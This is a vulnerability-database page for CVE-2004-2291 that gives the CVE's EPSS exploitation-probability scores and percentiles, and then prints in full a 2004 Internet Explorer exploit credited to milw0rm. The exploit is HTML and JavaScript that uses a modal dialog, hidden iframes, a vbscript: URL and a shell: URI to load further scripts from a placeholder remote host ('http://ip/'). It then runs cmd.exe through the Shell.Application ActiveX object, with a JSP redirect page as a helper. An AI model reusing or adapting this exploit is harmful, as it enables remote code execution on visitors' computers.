CVE-2004-2291 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	21.42%	–	–
2022-04-03	–	–	21.42%	–	–
2023-02-26	–	–	21.42%	–	–
2023-03-12	–	–	–	8.7%	–
2023-04-16	–	–	–	6.63%	–
2023-11-26	–	–	–	5.21%	–
2024-02-11	–	–	–	23.91%	–
2024-03-17	–	–	–	21.92%	–
2024-04-14	–	–	–	24.15%	–
2024-06-02	–	–	–	26.36%	–
2024-06-02	–	–	–	26.36%	–
2024-07-28	–	–	–	28.86%	–
2024-09-22	–	–	–	4.8%	–
2024-12-22	–	–	–	12.11%	–
2025-01-19	–	–	–	12.11%	–
2025-03-18	–	–	–	–	23.24%
2025-03-30	–	–	–	–	25.05%
2025-05-02	–	–	–	–	20.06%
2025-05-02	–	–	–	–	20.06,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	94%
2022-04-03	96%
2023-02-26	97%
2023-03-12	93%
2023-04-16	93%
2023-11-26	92%
2024-02-11	96%
2024-03-17	96%
2024-04-14	97%
2024-06-02	97%
2024-06-02	97%
2024-07-28	97%
2024-09-22	93%
2024-12-22	95%
2025-01-19	95%
2025-03-18	96%
2025-03-30	96%
2025-05-02	95%
2025-05-02	95%

<html> <body> <script language="Javascript"> function InjectedDuringRedirection(){ showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialogHeight:1\; dialogWidth:1\;").location="vbscript:\"<SCRIPT SRC='http://ip/shellscript_loader.js'><\/script>\""; } </script> <script language="javascript"> setTimeout("myiframe.execScript(InjectedDuringRedirection.toString())",100); setTimeout("myiframe.execScript('InjectedDuringRedirection()') ",101); document.write('<IFRAME ID=myiframe NAME=myiframe SRC="redir.jsp" style=display:none;></IFRAME>'); </script> </body> </html> --------------------------------------------------------- md.htm --------------------------------------------------------- <SCRIPT language="javascript"> window.returnValue = window.dialogArguments; function CheckStatus(){ try{tempVar=window.dialogArguments.location.href;}catch(e){window.close();} setTimeout("CheckStatus()",100); } CheckStatus(); </SCRIPT> --------------------------------------------------- shellscript_loader.js --------------------------------------------------- function getRealShell() { myiframe.document.write("<SCRIPT SRC='http://ip/shellscript.js'><\/SCRIPT>"); } document.write("<IFRAME ID=myiframe SRC='about:blank' WIDTH=200 HEIGHT=200></IFRAME>"); setTimeout("getRealShell()",100); ------------------------------------------------------- shellscript.js ------------------------------------------------------- function injectIt() { document.frames[0].document.body.insertAdjacentHTML('afterBegin','injected<script language= "JScript" DEFER>var obj=new ActiveXObject("Shell.Application");obj.ShellExecute("cmd.exe","/c pause");</script>'); } document.write('<iframe src="shell:WINDOWS\\Web\\TIP.HTM"></iframe>'); setTimeout("injectIt()", 1000); --------------------------------------------------------- redir.jsp ---------------------------------------------------------- <% Thread.sleep(1500); response.setStatus(302); response.setHeader("Location", "URL:res://shdoclc.dll/HTTP_501.htm"); %> # milw0rm.com [2004-07-09]